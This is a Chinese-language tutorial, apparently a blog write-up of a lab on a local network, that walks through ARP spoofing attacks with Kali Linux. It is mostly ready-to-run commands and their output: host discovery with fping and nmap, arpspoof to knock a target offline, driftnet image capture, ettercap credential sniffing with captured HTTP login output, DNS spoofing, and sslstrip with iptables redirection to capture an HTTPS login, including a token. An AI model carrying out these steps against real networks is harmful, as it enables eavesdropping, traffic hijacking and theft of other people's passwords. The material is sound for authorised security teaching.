作用、目的:
ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术。此种攻击可让攻击者取得局域网上的数据封包甚至可篡改封包,且可让网络上特定计算机或所有计算机无法正常连接,实现对目标主机/手机的断网攻击、图片窃取、密码监听等攻击目的。
以下内容为在局域网中进行实验,借助Kali的渗透测试工具对局域网内(同WIFI下)同一网段的PC主机、手机进行 ARP 欺骗 和 流量监听。
原理:
通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目。
局域网中若有一台计算机感染ARP木马,则感染该ARP木马的系统将会试图通过“ARP欺骗”手段截获所在网络内其它计算机的通信信息,并因此造成网内其它计算机的通信故障。
步骤:
打开Kali,采用以下工具进行渗透测试
#ARP断网
sudo -i
ifconfig //查找对应攻击机IP网段及IP,此实验192.168.80.131
#查找本地网关 192.168.80.2
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.80.2 0.0.0.0 UG 100 0 0 eth0
192.168.80.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0
fping -g 192.168.80.0/24 #搜索同网段下目标主机IP地址
192.168.80.2 is alive #网关
192.168.80.128 is alive #目标主机
192.168.80.131 is alive #Kali主机
#或
nmap 192.168.80.0/24 -sS -sV
Nmap scan report for 192.168.80.128
Host is up (0.00022s latency).
Not shown: 984 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
554/tcp open rtsp?
2869/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3306/tcp open mysql MySQL (unauthorized)
3389/tcp open tcpwrapped
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
10243/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:81:14:B7 (VMware)
Service Info: Host: CLIENT-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
#arp攻击
arpspoof -i eth0 -t 192.168.80.128 192.168.80.2 //eth0 网卡 80.128(目标主机ip) 80.2(网关)


ARP欺骗 获取web浏览器图片
#ARP欺骗 获取web浏览器图片
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.80.128 192.168.80.2
driftnet -i eth0

获取HTTP账户密码
#获取HTTP账户密码
arpspoof -i eth0 -t 192.168.80.128 192.168.80.2
ettercap -Tq -i eth0
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
5 hosts added to the hosts list...
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
#获取到的明文账号密码
HTTP : 120.131.6.130:80 -> USER: PASS: 23456 INFO: http://v3.chaoxing.com/toJcLogin
CONTENT: userNumber=23456&passWord=23456&source=1
#图形化界面
ettercap -G

DNS欺骗
#DNS欺骗
ifconfig #查看本机ip(192.168.80.131)
echo www.baidu.com A 192.168.80.131 > /etc/ettercap/etter.dns #更改百度DNS为kali主机地址
arpspoof -i eth0 -t 192.168.80.128 192.168.80.2
/etc/init.d/apache2 start #启动apache服务

捕捉https的账户密码
#捕捉https的账户密码
nano /etc/ettercap/etter.conf
去掉下面四条命令注释
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp -d %destination --dpo>
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp -d %destination --dp>
# pendant for IPv6 - Note that you need iptables v1.4.16 or newer to use IPv6 redirect
redir6_command_on = "ip6tables -t nat -A PREROUTING -i %iface -p tcp -d %destination --d>
redir6_command_off = "ip6tables -t nat -D PREROUTING -i %iface -p tcp -d %destination -->
#使用sslstrip把https转为http
sslstrip -a -f -k
ettercap -Tq -i eth0
#得到一下内容
HTTP : 180.101.49.186:443 -> USER: test PASS: cKbxLsHxtoI350cNJnKC4UlsvnmrRIvxdhhken6TpjUtQ7v2yfo51dNHJxFRy2rtReD8RFGWNExHfez1um9B4Fz9OCxcni/60P1XXgFP31eN8Uovge+70eHxoDbEe7/jnclXK1YrRojtXGwuKyxbEGEM6bgC55XETNcCXhlkToE= INFO: https://tieba.baidu.com/
CONTENT: staticpage=http%3A%2F%2Ftieba.baidu.com%2Ftb%2Fstatic-common%2Fhtml%2Fpass%2Fv3Jump.html&charset=GBK&token=43d8213010ab7a1cc8b670f6ebb5664a&tpl=tb&subpro=&apiver=v3&tt=1687096799094&codestring=&safeflg=0&u=https%3A%2F%2Ftieba.baidu.com%2F&isPhone=&detect=1&gid=DE3DB68-7267-409B-A932-4A13C9C68028&quick_user=0&logintype=dialogLogin&logLoginType=pc_loginDialog&idc=&loginmerge=true&mkey=&splogin=rate&username=test&password=cKbxLsHxtoI350cNJnKC4UlsvnmrRIvxdhhken6TpjUtQ7v2yfo51dNHJxFRy2rtReD8RFGWNExHfez1um9B4Fz9OCxcni%2F60P1XXgFP31eN8Uovge%2B70eHxoDbEe7%2FjnclXK1YrRojtXGwuKyxbEGEM6bgC55XETNcCXhlkToE%3D&mem_pass=on&rsakey=AfElnSJL2pgiuRyFjZ1AEC8lW5rzfGBQ&crypttype=12&ppui_logintime=313563&countrycode=&fp_uid=&fp_info=&loginversion=v4&supportdv=1&bdint_sync_cookie=&ds=nozYvA2%2BnefGXV6T%2FRfk3J9Nsm6%2BST8dWCjvO5ltCG7p1q0izYmL%2F3U9l17xPVjmSasq7N9y9y0ezzCMl90OLEN%2F5zc350ViWZA2qq2E9z6fFmzWEOTZ7dNs%2BsP%2BhnCWVrAWBYzqY9BdeTJBadDoIuSXDdONU62nuiNkTvIJWUcgrZjQdBn6tKN23VBdm9CqfVOtuM1lVTcdvpb4AK93Of4dxtFnPsmyv3%2FeNZb1KuSpp

